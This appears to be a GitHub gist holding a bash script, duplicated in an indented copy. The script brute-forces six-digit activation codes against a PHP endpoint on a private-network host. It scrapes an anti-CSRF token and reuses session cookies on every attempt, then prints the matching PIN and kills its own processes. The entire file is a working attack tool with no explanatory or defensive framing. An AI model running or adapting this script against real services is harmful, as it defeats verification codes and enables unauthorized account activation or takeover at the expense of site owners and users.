merlinxcy/gist:46dc0bb819101566baa70e5bc3b73f5d

## gistfile1.txt
#!/bin/bash

HOST=192.168.10.130
ACTIVATE=activate.php
ME=$(basename $0)

function token() {
  local COOKIE=""
  if [ -e cookie ]; then
    COOKIE=" -b cookie"
  else
    COOKIE="-c cookie"
  fi
  curl \
    -s \
    $COOKIE \
    http://$HOST/$1 2>/dev/null \
  | grep -m1 token \
  | cut -d"'" -f6
}

function activate() {
  curl \
    -s \
    -b cookie \
    -w %{http_code} \
    -o /dev/null \
    --data-urlencode "userid=$1" \
    --data-urlencode "activation_code=$2" \
    --data-urlencode "token=$(token $ACTIVATE)" \
    http://$HOST/$ACTIVATE
}

function die() {
  rm -f cookie
  for pid in $(ps aux \
               | grep -v grep \
               | grep "$ME" \
               | awk '{ print $2 }'); do
    kill -9 $pid &>/dev/null
  done
}

# activation
for pin in {000000..999999}; do
  if [ "$(activate $1 $pin $(token $ACTIVATE))" -ne 403 ]; then
    echo "[+] uid: $1, pin: $pin"
    die
  fi
done
	#!/bin/bash

	HOST=192.168.10.130
	ACTIVATE=activate.php
	ME=$(basename $0)

	function token() {
	local COOKIE=""
	if [ -e cookie ]; then
	COOKIE=" -b cookie"
	else
	COOKIE="-c cookie"
	fi
	curl \
	-s \
	$COOKIE \
	http://$HOST/$1 2>/dev/null \
	\| grep -m1 token \
	\| cut -d"'" -f6
	}

	function activate() {
	curl \
	-s \
	-b cookie \
	-w %{http_code} \
	-o /dev/null \
	--data-urlencode "userid=$1" \
	--data-urlencode "activation_code=$2" \
	--data-urlencode "token=$(token $ACTIVATE)" \
	http://$HOST/$ACTIVATE
	}

	function die() {
	rm -f cookie
	for pid in $(ps aux \
	\| grep -v grep \
	\| grep "$ME" \
	\| awk '{ print $2 }'); do
	kill -9 $pid &>/dev/null
	done
	}

	# activation
	for pin in {000000..999999}; do
	if [ "$(activate $1 $pin $(token $ACTIVATE))" -ne 403 ]; then
	echo "[+] uid: $1, pin: $pin"
	die
	fi
	done